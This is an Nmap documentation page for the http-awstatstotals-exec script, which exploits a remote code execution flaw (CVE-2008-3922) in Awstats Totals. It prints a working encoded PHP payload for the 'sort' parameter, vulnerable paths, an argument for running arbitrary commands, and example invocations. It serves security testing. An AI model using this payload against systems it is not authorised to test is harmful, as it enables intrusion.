Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

Sponsors


File http-awstatstotals-exec

Script types: portrule
Categories: vuln, intrusive, exploit
Download: http://nmap.org/svn/scripts/http-awstatstotals-exec.nse

User Summary

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).

This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function: ?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}

Common paths for Awstats Total:

  • /awstats/index.php
  • /awstatstotals/index.php
  • /awstats/awstatstotals.php

References:

Script Arguments

http-awstatstotals-exec.uri

Awstats Totals URI including path. Default: /index.php

http-awstatstotals-exec.cmd

Command to execute. Default: whoami

http-awstatstotals-exec.outfile

Output file. If set it saves the output in this file.

Other useful args when running this script: http.useragent - User Agent to use in GET request

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

unittest.run

See the documentation for the unittest library.

Example Usage

nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux

Requires


Author: Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See http://nmap.org/book/man-legal.html

action

action (host, port)

MAIN

Parameters

  • host:
  • port:

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]